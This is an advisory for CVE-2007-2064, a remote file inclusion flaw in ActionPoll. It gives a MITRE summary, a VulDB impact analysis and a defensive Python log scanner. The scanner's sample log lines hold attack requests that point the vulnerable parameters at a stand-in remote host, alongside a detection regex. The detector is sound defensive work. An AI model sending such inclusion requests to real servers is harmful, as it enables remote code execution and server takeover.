CVE-2007-2064 in ActionPoll
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in Robert Ladstaetter ActionPoll 1.1.0, and possibly 1.1.1, allow remote attackers to execute arbitrary PHP code via a URL in (1) the CONFIG_POLLDB parameter to actionpoll.php or (2) the CONFIG_DB parameter to db/DataReaderWriter.php, different vectors than CVE-2001-1297.
Analysis
by VulDB Data Team • 05/05/2025
The vulnerability identified as CVE-2007-2064 represents a critical remote file inclusion flaw affecting Robert Ladstaetter ActionPoll version 1.1.0 and potentially 1.1.1. This vulnerability falls under the category of insecure direct object references and remote code execution, specifically classified as CWE-88 and CWE-94 according to the Common Weakness Enumeration framework. The flaw resides in the application's handling of user-supplied input parameters that are directly incorporated into file inclusion operations without proper sanitization or validation.
The vulnerability is reachable through two distinct attack vectors in the application's codebase. The first vector involves the CONFIG_POLLDB parameter in the actionpoll.php file, while the second targets the CONFIG_DB parameter in the db/DataReaderWriter.php file. Both are classic remote file inclusion flaws in which attacker-controlled URLs are passed directly to include or require functions within the PHP application. This allows malicious actors to inject and execute arbitrary PHP code on the target server, effectively granting them remote code execution capabilities.
The operational impact of this vulnerability extends beyond simple code execution, as it enables attackers to gain full control over the affected web server. The vulnerability's remote nature means that exploitation can occur from any location without requiring physical access to the system. Attackers can leverage this flaw to establish persistent backdoors, exfiltrate sensitive data, or use the compromised server as a launch point for further attacks within the network. The fact that this vulnerability operates through different vectors than CVE-2001-1297 demonstrates the persistent nature of such flaws in legacy applications and highlights the importance of proper input validation.
From an attack perspective, this vulnerability aligns with the MITRE ATT&CK techniques T1190 (Exploit Public-Facing Application) and T1059 (Command and Scripting Interpreter). The attack surface is particularly concerning as it affects web applications that may be deployed in production environments with limited security monitoring. The vulnerability's exploitation requires minimal technical skill and can be automated using existing penetration testing frameworks, making it attractive to both skilled and unskilled attackers. Organizations should implement immediate mitigations including input validation, parameter sanitization, and the removal of vulnerable code paths to prevent exploitation of this vulnerability.
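For the monitoring side, the following added example (not part of the advisory and not ActionPoll code) scans web server access logs for the two script and parameter pairs named in the description when the parameter value is a URL. It assumes combined-format log lines and only sees query-string parameters; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script/parameter pairs named in the CVE-2007-2064 description.
WATCHED = {
    "actionpoll.php": "CONFIG_POLLDB",
    "db/DataReaderWriter.php": "CONFIG_DB",
}
# Value starting with a URL scheme (http:, ftp:, php:, data:, ...) or "//host".
# The scheme needs two or more characters so a drive letter ("C:") is not flagged.
REMOTE_VALUE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//)", re.IGNORECASE)
# Request line inside a combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(script, param, value)] for watched parameters carrying a URL."""
    parts = urlsplit(target)
    hits = []
    for script, param in WATCHED.items():
        # Path match is case-insensitive to cover case-insensitive file systems.
        if not parts.path.lower().endswith("/" + script.lower()):
            continue
        # parse_qsl percent-decodes each value once before the check.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            if name == param and REMOTE_VALUE.match(value):
                hits.append((script, param, value))
    return hits

def scan(log_lines):
    """Yield (line_number, script, param, value) for each flagged request."""
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST.search(line)
        if match:
            for hit in suspicious_params(match.group(1)):
                yield (number, *hit)

# Constructed sample log lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [05/May/2025:10:00:01 +0000] "GET /poll/actionpoll.php?id=3 HTTP/1.1" 200 512',
    '192.0.2.77 - - [05/May/2025:10:00:05 +0000] "GET /poll/actionpoll.php?CONFIG_POLLDB=http%3A%2F%2Fremote.example%2Fa HTTP/1.1" 200 90',
    '192.0.2.77 - - [05/May/2025:10:00:09 +0000] "GET /poll/db/DataReaderWriter.php?CONFIG_DB=ftp://remote.example/a HTTP/1.1" 200 90',
    '192.0.2.10 - - [05/May/2025:10:00:12 +0000] "GET /poll/db/DataReaderWriter.php?CONFIG_DB=mysql HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body do not appear in access logs, so this check complements, and does not replace, fixing the include paths themselves.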